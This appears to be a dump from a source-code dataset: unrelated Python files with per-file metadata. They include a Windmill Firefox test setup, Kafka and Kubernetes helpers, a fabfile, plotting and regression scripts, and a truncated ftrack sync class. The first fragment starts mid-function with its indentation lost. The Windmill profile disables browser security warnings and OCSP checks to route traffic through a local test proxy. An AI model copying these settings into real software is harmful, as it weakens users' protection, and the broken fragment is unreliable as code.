windmill.settings['MOZILLA_PLUGINS'] = [os.path.join(os.path.dirname(__file__), os.path.pardir, 'xpi', 'firebug-1.4.0b7-fx.xpi')]
prop_hash = {
'extensions.chromebug.openalways' : True,
'extensions.chromebug.showIntroduction' : False,
'general.warnOnAboutConfig' : False,
'extensions.venkman.enableChromeFilter' : False,
# Get rid of default browser check
"browser.shell.checkDefaultBrowser": False,
# Suppress authentication confirmations
"network.http.phishy-userpass-length": 255,
# Disable pop-up blocking
"browser.allowpopups": True,
"dom.disable_open_during_load": False,
# Open links in new windows (Firefox 2.0)
"browser.link.open_external": 2,
"browser.link.open_newwindow": 2,
# Configure local proxy
"network.proxy.http": '127.0.0.1',
"network.proxy.http_port": windmill.settings['SERVER_HTTP_PORT'],
"network.proxy.no_proxies_on": "",
"network.proxy.type": 1,
#"network.http.proxy.pipelining" : True,
"network.http.max-connections": 10,
"network.http.max-connections-per-server": 8,
# "network.http.max-persistent-connections-per-proxy": 2,
# "network.http.max-persistent-connections-per-server": 2,
"network.http.pipelining.maxrequests": 10,
# Turn off favicon requests, no need for even more requests
"browser.chrome.favicons": False,
"startup.homepage_override_url": test_url,
"browser.startup.homepage": test_url,
"startup.homepage_welcome_url": "",
# Disable security warnings
"security.warn_submit_insecure": False,
"security.warn_submit_insecure.show_once": False,
"security.warn_entering_secure": False,
"security.warn_entering_secure.show_once": False,
"security.warn_entering_weak": False,
"security.warn_entering_weak.show_once": False,
"security.warn_leaving_secure": False,
"security.warn_leaving_secure.show_once": False,
"security.warn_viewing_mixed": False,
"security.warn_viewing_mixed.show_once": False,
# Disable cache
"browser.cache.disk.enable": False,
"browser.sessionstore.resume_from_crash": False,
# self.user_pref('"browser.cache.memory.enable", false')
# Disable "do you want to remember this password?"
"signon.rememberSignons": False,
"dom.max_script_run_time": 100,
# Disable OSCP validation, breaks through proxy.
"security.OCSP.enabled":0,
#Make the firefox IDE stop showing the location bar
"dom.disable_window_open_feature.location":False,
"browser.rights.3.shown": True,
}
if windmill.has_ssl:
prop_hash["network.proxy.ssl"] = '127.0.0.1'
prop_hash["network.proxy.ssl_port"] = windmill.settings['SERVER_HTTP_PORT']
windmill.settings['MOZILLA_PREFERENCES'].update(prop_hash)
windmill.settings['MOZILLA_CMD_ARGS'] = [test_url]
controller = mozrunner.get_moz_from_settings(copy.copy(windmill.settings))
# Override cert8.db with one from windmill which has windmill certificate
# in it, that way self-signed certificate warning is suppressed.
cert8 = resource_string(__name__, 'cert8.db')
if sys.platform not in ('win32', 'cygwin',):
f = open(os.path.join(controller.profile, 'cert8.db'), 'w')
else:
f = open(os.path.join(controller.profile, 'cert8.db'), 'wb')
f.write(cert8)
f.close()
windmill.settings['MOZILLA_PROFILE'] = mozrunner.settings['MOZILLA_PROFILE']
return controller
def get_ie_controller():
    """Build and return the Internet Explorer browser controller."""
    import ie
    return ie.InternetExplorer()
def get_safari_controller():
    """Build and return the Safari browser controller."""
    import safari
    return safari.Safari()
def get_chrome_controller():
    """Get the Chrome browser object"""
    # (docstring previously said "Safari" -- copy-paste from the function above)
    import chrome
    browser = chrome.Chrome()
    return browser
| 39.09396
| 137
| 0.671416
|
195e5eb29267220c9fe00eb0f89deac36067d74f
| 286
|
py
|
Python
|
tests/integration/aiohttp_utils.py
|
Rippling/vcrpy
|
69dd6e7c1e9fec9b3390a2423e605293dc58003d
|
[
"MIT"
] | null | null | null |
tests/integration/aiohttp_utils.py
|
Rippling/vcrpy
|
69dd6e7c1e9fec9b3390a2423e605293dc58003d
|
[
"MIT"
] | null | null | null |
tests/integration/aiohttp_utils.py
|
Rippling/vcrpy
|
69dd6e7c1e9fec9b3390a2423e605293dc58003d
|
[
"MIT"
] | null | null | null |
import asyncio
async def aiohttp_request(session, method, url, as_text, **kwargs):
    """Perform an aiohttp request and read the whole body.

    :param session: an aiohttp ``ClientSession``-like object
    :param method: HTTP method name, e.g. ``"GET"``
    :param url: request URL
    :param as_text: when true the body is decoded text, otherwise parsed JSON
    :returns: ``(response, body)`` tuple

    Rewritten as a native coroutine: the previous ``@asyncio.coroutine`` /
    ``yield from`` form was deprecated in Python 3.8 and removed in 3.11.
    ``await`` works everywhere the old generator-based coroutine did.
    """
    response = await session.request(method, url, **kwargs)
    body = await response.text() if as_text else await response.json()
    return response, body
| 35.75
| 108
| 0.723776
|
431d8d77a9a2ab0f9cef81a155d0e75224f78282
| 4,690
|
py
|
Python
|
corehq/apps/change_feed/topics.py
|
akashkj/commcare-hq
|
b00a62336ec26cea1477dfb8c048c548cc462831
|
[
"BSD-3-Clause"
] | null | null | null |
corehq/apps/change_feed/topics.py
|
akashkj/commcare-hq
|
b00a62336ec26cea1477dfb8c048c548cc462831
|
[
"BSD-3-Clause"
] | null | null | null |
corehq/apps/change_feed/topics.py
|
akashkj/commcare-hq
|
b00a62336ec26cea1477dfb8c048c548cc462831
|
[
"BSD-3-Clause"
] | null | null | null |
from kafka.common import OffsetRequestPayload
from corehq.apps.app_manager.util import app_doc_types
from corehq.apps.change_feed.connection import get_simple_kafka_client
from corehq.apps.change_feed.exceptions import UnavailableKafkaOffset
from corehq.form_processor.models import XFormInstanceSQL
# Kafka topic names used by the change feed. For changes that carry no couch
# doc_type, the topic name itself doubles as the document "type"
# (see get_topic_for_doc_type below).
DOMAIN = 'domain'
META = 'meta'  # catch-all topic; NOT related to the 'meta' Couch database
APP = 'app'
CASE_SQL = 'case-sql'
FORM_SQL = 'form-sql'
SMS = 'sms'
LEDGER = 'ledger'
COMMCARE_USER = 'commcare-user'
GROUP = 'group'
WEB_USER = 'web-user'
LOCATION = 'location'
SYNCLOG_SQL = 'synclog-sql'

# Convenience groupings used by consumers.
CASE_TOPICS = (CASE_SQL, )
FORM_TOPICS = (FORM_SQL, )
USER_TOPICS = (COMMCARE_USER, WEB_USER)

# Every topic this module knows about; offset queries assert membership here.
ALL = (
    CASE_SQL,
    COMMCARE_USER,
    DOMAIN,
    FORM_SQL,
    GROUP,
    LEDGER,
    META,
    SMS,
    WEB_USER,
    APP,
    LOCATION,
    SYNCLOG_SQL,
)
def get_topic_for_doc_type(doc_type, data_source_type=None, default_topic=None):
    """Map a document type to the Kafka topic it is published on.

    Checks each known doc-type group in priority order; falls back to
    *default_topic* when provided, otherwise to META.
    (*data_source_type* is accepted for interface compatibility but unused.)
    """
    from corehq.apps.change_feed import document_types
    from corehq.apps.locations.document_store import LOCATION_DOC_TYPE

    if doc_type in document_types.CASE_DOC_TYPES:
        return CASE_SQL
    if doc_type in XFormInstanceSQL.ALL_DOC_TYPES:
        return FORM_SQL
    if doc_type in document_types.DOMAIN_DOC_TYPES:
        return DOMAIN
    if doc_type in document_types.MOBILE_USER_DOC_TYPES:
        return COMMCARE_USER
    if doc_type in document_types.WEB_USER_DOC_TYPES:
        return WEB_USER
    if doc_type in document_types.GROUP_DOC_TYPES:
        return GROUP
    if doc_type in document_types.SYNCLOG_DOC_TYPES:
        return SYNCLOG_SQL
    if doc_type in app_doc_types():
        return APP
    if doc_type == LOCATION_DOC_TYPE:
        return LOCATION
    if doc_type in ALL:
        # Docs without a real doc_type use the Kafka topic name itself.
        return doc_type
    if default_topic:
        return default_topic
    # At some point this may become more granular; note that META does not
    # map to the 'meta' Couch database.
    return META
def get_topic_offset(topic):
    """Return the latest kafka offset dict for a single *topic*."""
    return get_multi_topic_offset([topic])
def get_multi_topic_offset(topics):
    """Return the latest offsets for *topics*, keyed by (topic, partition)."""
    return _get_topic_offsets(topics, latest=True)
def get_multi_topic_first_available_offsets(topics):
    """Return the earliest available offsets for *topics*, keyed by (topic, partition)."""
    return _get_topic_offsets(topics, latest=False)
def _get_topic_offsets(topics, latest):
    """
    :param topics: list of topics
    :param latest: True to fetch latest offsets, False to fetch earliest available
    :return: dict: { (topic, partition): offset, ... }
    """
    # https://cwiki.apache.org/confluence/display/KAFKA/A+Guide+To+The+Kafka+Protocol#AGuideToTheKafkaProtocol-OffsetRequest
    # https://cfchou.github.io/blog/2015/04/23/a-closer-look-at-kafka-offsetrequest/
    assert set(topics) <= set(ALL)

    # Kafka's special timestamps: -1 == latest offset, -2 == earliest offset.
    timestamp = -1 if latest else -2

    with get_simple_kafka_client() as client:
        partitions_by_topic = client.topic_partitions
        # One request per (topic, partition), asking for a single offset.
        requests = [
            OffsetRequestPayload(topic, partition, timestamp, 1)
            for topic in topics
            for partition in partitions_by_topic.get(topic, {})
        ]
        # Pre-seed every requested key so missing responses stay visible as None.
        offsets = {(req.topic, req.partition): None for req in requests}
        for response in client.send_offset_request(requests):
            offsets[(response.topic, response.partition)] = response.offsets[0]
        return offsets
def validate_offsets(expected_offsets):
    """
    Takes in a dictionary of offsets ((topic, partition) tuples mapped to
    checkpoint numbers) and ensures they are all available in the current
    kafka feed.

    :raises UnavailableKafkaOffset: when a partition is unknown or the
        checkpointed offset has already expired from the feed.
    """
    if not expected_offsets:
        return

    topics = {topic_partition[0] for topic_partition in expected_offsets}
    available_offsets = get_multi_topic_first_available_offsets(topics)
    for topic_partition, offset in expected_offsets.items():
        topic, partition = topic_partition
        if topic_partition not in available_offsets:
            raise UnavailableKafkaOffset("Invalid partition '{}' for topic '{}'".format(partition, topic))

        # Use the already-bound `offset` instead of re-indexing the dict
        # (previous code ignored the loop value and looked it up again).
        if offset < available_offsets[topic_partition]:
            message = (
                'First available topic offset for {}:{} is {} but needed {}.'
            ).format(topic, partition, available_offsets[topic_partition], offset)
            raise UnavailableKafkaOffset(message)
| 33.5
| 124
| 0.696802
|
b74a1e0cca76602597ab33ce92cb74cb847e1ccc
| 26
|
py
|
Python
|
rio_viz/ressources/__init__.py
|
geospatial-jeff/rio-viz
|
84aee810e5d6eb8b95a6a230ea56ddd65ffaebc6
|
[
"MIT"
] | null | null | null |
rio_viz/ressources/__init__.py
|
geospatial-jeff/rio-viz
|
84aee810e5d6eb8b95a6a230ea56ddd65ffaebc6
|
[
"MIT"
] | null | null | null |
rio_viz/ressources/__init__.py
|
geospatial-jeff/rio-viz
|
84aee810e5d6eb8b95a6a230ea56ddd65ffaebc6
|
[
"MIT"
] | null | null | null |
"""titiler ressources."""
| 13
| 25
| 0.653846
|
bdb74fde41c500b91ae7315f8ba118dcf6464215
| 7,099
|
py
|
Python
|
kubernetes/client/models/v1_controller_revision_list.py
|
carloscastrojumo/python
|
f461dd42d48650a4ae1b41d630875cad9fcb68ad
|
[
"Apache-2.0"
] | 2
|
2021-03-09T12:42:05.000Z
|
2021-03-09T13:27:50.000Z
|
kubernetes/client/models/v1_controller_revision_list.py
|
carloscastrojumo/python
|
f461dd42d48650a4ae1b41d630875cad9fcb68ad
|
[
"Apache-2.0"
] | 7
|
2021-04-13T03:04:42.000Z
|
2022-03-02T03:10:18.000Z
|
kubernetes/client/models/v1_controller_revision_list.py
|
carloscastrojumo/python
|
f461dd42d48650a4ae1b41d630875cad9fcb68ad
|
[
"Apache-2.0"
] | 1
|
2019-07-05T07:54:10.000Z
|
2019-07-05T07:54:10.000Z
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.17
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1ControllerRevisionList(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    openapi_types = {
        'api_version': 'str',
        'items': 'list[V1ControllerRevision]',
        'kind': 'str',
        'metadata': 'V1ListMeta'
    }

    attribute_map = {
        'api_version': 'apiVersion',
        'items': 'items',
        'kind': 'kind',
        'metadata': 'metadata'
    }

    def __init__(self, api_version=None, items=None, kind=None, metadata=None, local_vars_configuration=None):  # noqa: E501
        """V1ControllerRevisionList - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration

        self._api_version = None
        self._items = None
        self._kind = None
        self._metadata = None
        self.discriminator = None

        # `items` is the only required field (its setter validates non-None);
        # all other fields stay None unless explicitly provided.
        if api_version is not None:
            self.api_version = api_version
        self.items = items
        if kind is not None:
            self.kind = kind
        if metadata is not None:
            self.metadata = metadata

    @property
    def api_version(self):
        """Gets the api_version of this V1ControllerRevisionList.  # noqa: E501

        APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources  # noqa: E501

        :return: The api_version of this V1ControllerRevisionList.  # noqa: E501
        :rtype: str
        """
        return self._api_version

    @api_version.setter
    def api_version(self, api_version):
        """Sets the api_version of this V1ControllerRevisionList.

        APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources  # noqa: E501

        :param api_version: The api_version of this V1ControllerRevisionList.  # noqa: E501
        :type: str
        """

        self._api_version = api_version

    @property
    def items(self):
        """Gets the items of this V1ControllerRevisionList.  # noqa: E501

        Items is the list of ControllerRevisions  # noqa: E501

        :return: The items of this V1ControllerRevisionList.  # noqa: E501
        :rtype: list[V1ControllerRevision]
        """
        return self._items

    @items.setter
    def items(self, items):
        """Sets the items of this V1ControllerRevisionList.

        Items is the list of ControllerRevisions  # noqa: E501

        :param items: The items of this V1ControllerRevisionList.  # noqa: E501
        :type: list[V1ControllerRevision]
        """
        if self.local_vars_configuration.client_side_validation and items is None:  # noqa: E501
            raise ValueError("Invalid value for `items`, must not be `None`")  # noqa: E501

        self._items = items

    @property
    def kind(self):
        """Gets the kind of this V1ControllerRevisionList.  # noqa: E501

        Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds  # noqa: E501

        :return: The kind of this V1ControllerRevisionList.  # noqa: E501
        :rtype: str
        """
        return self._kind

    @kind.setter
    def kind(self, kind):
        """Sets the kind of this V1ControllerRevisionList.

        Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds  # noqa: E501

        :param kind: The kind of this V1ControllerRevisionList.  # noqa: E501
        :type: str
        """

        self._kind = kind

    @property
    def metadata(self):
        """Gets the metadata of this V1ControllerRevisionList.  # noqa: E501


        :return: The metadata of this V1ControllerRevisionList.  # noqa: E501
        :rtype: V1ListMeta
        """
        return self._metadata

    @metadata.setter
    def metadata(self, metadata):
        """Sets the metadata of this V1ControllerRevisionList.


        :param metadata: The metadata of this V1ControllerRevisionList.  # noqa: E501
        :type: V1ListMeta
        """

        self._metadata = metadata

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Recursively serialize nested models: lists and dicts of models are
        # converted element-wise; anything with to_dict() is delegated to.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        # Equality is structural: compares the fully-serialized dicts.
        if not isinstance(other, V1ControllerRevisionList):
            return False

        return self.to_dict() == other.to_dict()

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, V1ControllerRevisionList):
            return True

        return self.to_dict() != other.to_dict()
| 34.461165
| 312
| 0.634878
|
216ecf0f1e333ebcd50362f20c84e83d9e997fb3
| 1,955
|
py
|
Python
|
fabfile.py
|
sporsh/carnifex
|
82dd3bd2bc134dfb69a78f43171e227f2127060b
|
[
"MIT"
] | 4
|
2015-12-21T00:59:22.000Z
|
2021-02-08T02:33:52.000Z
|
fabfile.py
|
sporsh/carnifex
|
82dd3bd2bc134dfb69a78f43171e227f2127060b
|
[
"MIT"
] | null | null | null |
fabfile.py
|
sporsh/carnifex
|
82dd3bd2bc134dfb69a78f43171e227f2127060b
|
[
"MIT"
] | 1
|
2017-03-24T09:12:45.000Z
|
2017-03-24T09:12:45.000Z
|
from fabric.api import local
TESTS_PATH = 'test'
def test(path=TESTS_PATH, coverage=False, nosetup=False, *args, **kwargs):
    """Run the nose suite, then (unless *nosetup*) the setup.py sanity check.

    Extra positional/keyword arguments are forwarded to ``nosetests``
    unchanged. (NOTE(review): ``nosetests`` below only accepts ``path`` and
    ``coverage``; extras would raise TypeError -- preserved as-is.)
    """
    nosetests(path, coverage, *args, **kwargs)
    if nosetup:
        return
    local("python setup.py check")
def nosetests(path=TESTS_PATH, coverage=False):
    """Run the test suite under nosetests, optionally with coverage reporting."""
    cmd = ["nosetests"]
    if coverage:
        cmd += [
            "--with-coverage",
            "--cover-erase",
            "--cover-package=carnifex",
            "--cover-html",
        ]
    cmd.append(path)
    local(" ".join(cmd))
def trial(path=TESTS_PATH, coverage=False):
    """Run tests using trial (Twisted's test runner), optionally with coverage.
    """
    args = ['trial']
    if coverage:
        args.append('--coverage')
    args.append(path)
    # Python 2 print statement -- this fabfile predates Python 3.
    print args
    local(' '.join(args))
def unittest(path=TESTS_PATH):
    """Run the test suite via stdlib unittest discovery.

    NOTE(review): this task name shadows the stdlib ``unittest`` module
    within the fabfile; renaming it would change the fabric CLI task name.
    """
    local("python -m unittest discover -s %s" % path)
def release():
    """Run the test suite and, if it passes, upload an sdist to PyPI."""
    test()
    local("python setup.py sdist upload")
def clean(verified=False):
    """Clean build artifacts and untracked files.

    With ``verified=False`` (the default) ``git clean`` runs in dry-run mode
    (``-n``); pass ``verified=True`` to actually delete (``-f``).
    IDE project files are always excluded.
    """
    local("python setup.py clean")
    cmd = [
        "git clean",
        "-dx",
        "-e '.pydevproject'",
        "-e '.project'",
        "-f" if verified else "-n",
    ]
    local(' '.join(cmd))
def whatsnew():
    """Fetch the remote and print commits unique to each side.

    Local-only commits are shown with a green marker, remote-only commits
    with a red one. (Python 2 print statements -- file predates Python 3.)
    """
    local("git fetch")
    # Commits on HEAD that the fetched remote does not have.
    locallog = local("git log --abbrev-commit "
                     "--format='%Cgreen* %C(yellow)%h %Cblue%aN %Cgreen%ar "
                     "%Creset%s' FETCH_HEAD..", capture=True)
    # Commits on the fetched remote that HEAD does not have.
    remotelog = local("git log --abbrev-commit "
                      "--format='%Cred* %C(yellow)%h %Cblue%aN %Cgreen%ar "
                      "%Creset%s' ..FETCH_HEAD", capture=True)
    if locallog:
        print
        print "YOUR CHANGES:"
        print "-------------"
        print locallog
    if remotelog:
        print
        print "REMOTE CHANGES:"
        print "---------------"
        print remotelog
| 26.780822
| 76
| 0.539642
|
06f951fec73ace15982a9fe04f0f17106f8d37d4
| 6,540
|
py
|
Python
|
ClarenceData/sensor data/Plot.py
|
acse-2020/acse2020-acse9-finalreport-acse-yl2020
|
310287b8d0e6347895047e2766b4b6fc1be24716
|
[
"Apache-2.0"
] | null | null | null |
ClarenceData/sensor data/Plot.py
|
acse-2020/acse2020-acse9-finalreport-acse-yl2020
|
310287b8d0e6347895047e2766b4b6fc1be24716
|
[
"Apache-2.0"
] | null | null | null |
ClarenceData/sensor data/Plot.py
|
acse-2020/acse2020-acse9-finalreport-acse-yl2020
|
310287b8d0e6347895047e2766b4b6fc1be24716
|
[
"Apache-2.0"
] | 1
|
2022-01-29T17:06:14.000Z
|
2022-01-29T17:06:14.000Z
|
#!/usr/bin/env python3.8
#//////////////////////////////////////////////////////
#-- Dr Laetitia Mottet
# Applied Modelling and Computation Group
# Department of Earth Science and Engineering
# Imperial College London
# l.mottet@imperial.ac.uk
# laetitia.mottet@gmail.com
#//////////////////////////////////////////////////////
# # # ########################## # # #
# # # ###### LIBRARIES ###### # # #
# # # ########################## # # #
from numpy import *
from math import *
import sys, os
sys.path.append("/home/lmottet/fluidity-temp/python/")
import numpy as np
import vtk
import vtktools
import matplotlib.pyplot as plt
import datetime, time
# # # ########################## # # #
# # # ###### FUNCTIONS ###### # # #
# # # ########################## # # #
#-------------------------------------------------#
#-- Function to read data in a text file -#
#-------------------------------------------------#
def ReadData(filename):
    """Read whitespace-separated numeric rows from *filename*.

    Each line becomes one row of floats; the result is returned transposed
    (one entry per column), as produced by ``np.transpose``.

    Fixes: the file handle was previously never closed (no ``with``); the
    index-based readlines loop is replaced by a comprehension. Blank lines
    still yield empty rows, matching the original behavior.
    """
    with open(filename, 'r') as sf:
        rows = [[float(v) for v in line.split()] for line in sf]
    return np.transpose(rows)
# # # ########################## # # #
# # # ###### MAIN ###### # # #
# # # ########################## # # #
if __name__ == '__main__':
    tic = time.time()

    # Load CFD (Fluidity) and measured (experiment) CO2 time series.
    # Row 0 is time; rows 1..7 are the seven sensors.
    CO2_Fluidity = ReadData('CO2_Fluidity.dat')
    print ('CO2_Fluidity ::', CO2_Fluidity)
    CO2_Experiment = ReadData('CO2_Experiment.dat')
    print ('CO2_Experiment ::', CO2_Experiment)

    # One color per sensor, shared by every figure.
    colorSt = ['black', 'magenta', 'green', 'red', 'yellow', 'cyan', 'orange']

    def render_figure(figID, series, outname, title=None):
        """Draw one CO2-vs-time figure and save it as *outname*.

        :param figID: matplotlib figure number
        :param series: iterable of (xs, ys, color, linestyle, label) tuples
        :param outname: output SVG file name
        :param title: optional title placed above the legend
        """
        plt.figure(figID)
        ax = plt.subplot(111)
        for xs, ys, color, linestyle, label in series:
            plt.plot(xs, ys, color=color, linestyle=linestyle, marker=' ',
                     label=label)
        plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.22), ncol=3,
                   fontsize=10, fancybox=True, shadow=True)
        if title is not None:
            plt.title(title, y=1.23)
        plt.xlabel('Time (sec.)')
        plt.ylabel('CO2 (ppm)')
        # Shrink the axes to leave room for the legend above the plot.
        box = ax.get_position()
        ax.set_position([box.x0, box.y0, box.width, box.height * 0.85])
        axes = plt.gca()
        axes.set_ylim(400, 1600)
        axes.set_xlim(0, 1500)
        plt.grid()
        plt.savefig(outname)
        plt.close()

    figID = 0

    # Figure 1: Fluidity (CFD) data only, solid lines.
    figID += 1
    render_figure(
        figID,
        [(CO2_Fluidity[0], CO2_Fluidity[i + 1], colorSt[i], '-',
          'Sensor ' + str(i + 1) + ' (CFD)') for i in range(0, 7)],
        'CO2_Fluidity.svg', title='Fluidity CO2')

    # Figure 2: experiment data only, solid lines.
    figID += 1
    render_figure(
        figID,
        [(CO2_Experiment[0], CO2_Experiment[i + 1], colorSt[i], '-',
          'Sensor ' + str(i + 1) + ' (Exp)') for i in range(0, 7)],
        'CO2_Experiment.svg', title='Experiment CO2')

    # Figures 3..9: CFD (solid) vs experiment (dashed), one figure per sensor.
    for sensorID in range(0, 7):
        figID += 1
        render_figure(
            figID,
            [(CO2_Fluidity[0], CO2_Fluidity[sensorID + 1],
              colorSt[sensorID], '-',
              'Sensor ' + str(sensorID + 1) + ' (CFD)'),
             (CO2_Experiment[0], CO2_Experiment[sensorID + 1],
              colorSt[sensorID], '--',
              'Sensor ' + str(sensorID + 1) + ' (Exp)')],
            'CO2_FluidityExperiment_sensor' + str(sensorID + 1) + '.svg')

    # Final figure: all sensors, CFD (solid) and experiment (dashed) together.
    figID += 1
    render_figure(
        figID,
        [(CO2_Fluidity[0], CO2_Fluidity[i + 1], colorSt[i], '-',
          'Sensor ' + str(i + 1) + ' (CFD)') for i in range(0, 7)]
        + [(CO2_Experiment[0], CO2_Experiment[i + 1], colorSt[i], '--',
            'Sensor ' + str(i + 1) + ' (Exp)') for i in range(0, 7)],
        'CO2_FluidityExperiment.svg')

    toc = time.time()
    print ('\n\nTime : ', toc - tic, 'sec')
| 34.240838
| 173
| 0.48792
|
32553253537a8c932ffa1c0c19ded0f0d3121154
| 908
|
py
|
Python
|
100 Curso aulapharos/008 BibliotecasModulos/005 Spyder scikit-learn/scikit-learn004.py
|
malcabaut/AprendiendoPython
|
b1e8731f1614b08b5ace1b7d1ecbeb041b21f28b
|
[
"MIT"
] | null | null | null |
100 Curso aulapharos/008 BibliotecasModulos/005 Spyder scikit-learn/scikit-learn004.py
|
malcabaut/AprendiendoPython
|
b1e8731f1614b08b5ace1b7d1ecbeb041b21f28b
|
[
"MIT"
] | null | null | null |
100 Curso aulapharos/008 BibliotecasModulos/005 Spyder scikit-learn/scikit-learn004.py
|
malcabaut/AprendiendoPython
|
b1e8731f1614b08b5ace1b7d1ecbeb041b21f28b
|
[
"MIT"
] | null | null | null |
from sklearn import metrics
import numpy as np
import matplotlib.pyplot as plt
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
import pandas as pd
# Load the "USA Housing" dataset; expects the CSV in the working directory.
USAhousing = pd.read_csv('USA_Housing.csv')
# Features: area statistics. Target: sale price.
X = USAhousing[['Avg. Area Income', 'Avg. Area House Age', 'Avg. Area Number of Rooms','Avg. Area Number of Bedrooms', 'Area Population']]
Y = USAhousing['Price']
# Hold out 40% of rows for evaluation. No random_state is set, so the split
# (and all metrics below) differ on every run.
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4)
# Fit an ordinary least-squares model and print the learned coefficients.
lm = LinearRegression()
lm.fit(X_train,Y_train)
coeficientes= pd.DataFrame(lm.coef_,X.columns,columns=['Coefficient'])
print(coeficientes)
# Scatter of actual vs. predicted prices (figure is drawn but not shown or
# saved within this script).
predicciones = lm.predict(X_test)
plt.scatter(Y_test,predicciones)
# Standard regression error metrics on the held-out set.
print('MAE:', metrics.mean_absolute_error(Y_test, predicciones))
print('MSE:', metrics.mean_squared_error(Y_test, predicciones))
print('RMSE:', np.sqrt(metrics.mean_squared_error(Y_test, predicciones)))
| 47.789474
| 139
| 0.773128
|
91efeb21d07467bf90ae566741198e2f781b0ab3
| 894
|
py
|
Python
|
test/test_fixed_asset_input.py
|
altoyield/python-beanieclient
|
448b8dd328054eaf32dd7d0bdff700e603b5c27d
|
[
"Apache-2.0"
] | null | null | null |
test/test_fixed_asset_input.py
|
altoyield/python-beanieclient
|
448b8dd328054eaf32dd7d0bdff700e603b5c27d
|
[
"Apache-2.0"
] | null | null | null |
test/test_fixed_asset_input.py
|
altoyield/python-beanieclient
|
448b8dd328054eaf32dd7d0bdff700e603b5c27d
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Beanie ERP API
An API specification for interacting with the Beanie ERP system # noqa: E501
OpenAPI spec version: 0.2
Contact: dev@bean.ie
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import beanie
from beanie.models.fixed_asset_input import FixedAssetInput # noqa: E501
from beanie.rest import ApiException
class TestFixedAssetInput(unittest.TestCase):
    """FixedAssetInput unit test stubs (auto-generated by swagger-codegen)."""

    def setUp(self):
        # No fixtures required for these stubs.
        pass

    def tearDown(self):
        pass

    def testFixedAssetInput(self):
        """Test FixedAssetInput"""
        # FIXME: construct object with mandatory attributes with example values
        # model = beanie.models.fixed_asset_input.FixedAssetInput()  # noqa: E501
        pass


if __name__ == '__main__':
    unittest.main()
| 21.804878
| 81
| 0.700224
|
251d87331e8040de8b5fd2f18b72cb0129f34d0c
| 94,153
|
py
|
Python
|
pype/modules/ftrack/events/event_sync_to_avalon.py
|
Yowza-Animation/pype
|
0212fa8357e6ffd490230193e69e101aaf262587
|
[
"MIT"
] | null | null | null |
pype/modules/ftrack/events/event_sync_to_avalon.py
|
Yowza-Animation/pype
|
0212fa8357e6ffd490230193e69e101aaf262587
|
[
"MIT"
] | null | null | null |
pype/modules/ftrack/events/event_sync_to_avalon.py
|
Yowza-Animation/pype
|
0212fa8357e6ffd490230193e69e101aaf262587
|
[
"MIT"
] | null | null | null |
import os
import collections
import copy
import queue
import time
import datetime
import atexit
import traceback
from bson.objectid import ObjectId
from pymongo import UpdateOne
from avalon import schema
from pype.modules.ftrack.lib import avalon_sync
from pype.modules.ftrack.lib.avalon_sync import (
CUST_ATTR_ID_KEY, CUST_ATTR_AUTO_SYNC, EntitySchemas
)
import ftrack_api
from pype.modules.ftrack import BaseEvent
from avalon.api import AvalonMongoDB
class SyncToAvalonEvent(BaseEvent):
dbcon = AvalonMongoDB()
interest_entTypes = ["show", "task"]
ignore_ent_types = ["Milestone"]
ignore_keys = ["statusid", "thumbid"]
project_query = (
"select full_name, name, custom_attributes"
", project_schema._task_type_schema.types.name"
" from Project where id is \"{}\""
)
entities_query_by_id = (
"select id, name, parent_id, link, custom_attributes from TypedContext"
" where project_id is \"{}\" and id in ({})"
)
# useful for getting all tasks for asset
task_entities_query_by_parent_id = (
"select id, name, parent_id, type_id from Task"
" where project_id is \"{}\" and parent_id in ({})"
)
task_types_query = (
"select id, name from Type"
)
entities_name_query_by_name = (
"select id, name from TypedContext"
" where project_id is \"{}\" and name in ({})"
)
created_entities = []
report_splitter = {"type": "label", "value": "---"}
    def __init__(self, session, plugins_presets={}):
        """Set up debug throttling and the processing session.

        :param session: a ftrack_api.Session instance
        :param plugins_presets: presets forwarded to BaseEvent
            (NOTE(review): mutable default shared across calls -- safe only
            if never mutated; confirm.)
        """
        # Debug settings
        # - time expiration in seconds
        self.debug_print_time_expiration = 5 * 60
        # - store current time
        self.debug_print_time = datetime.datetime.now()
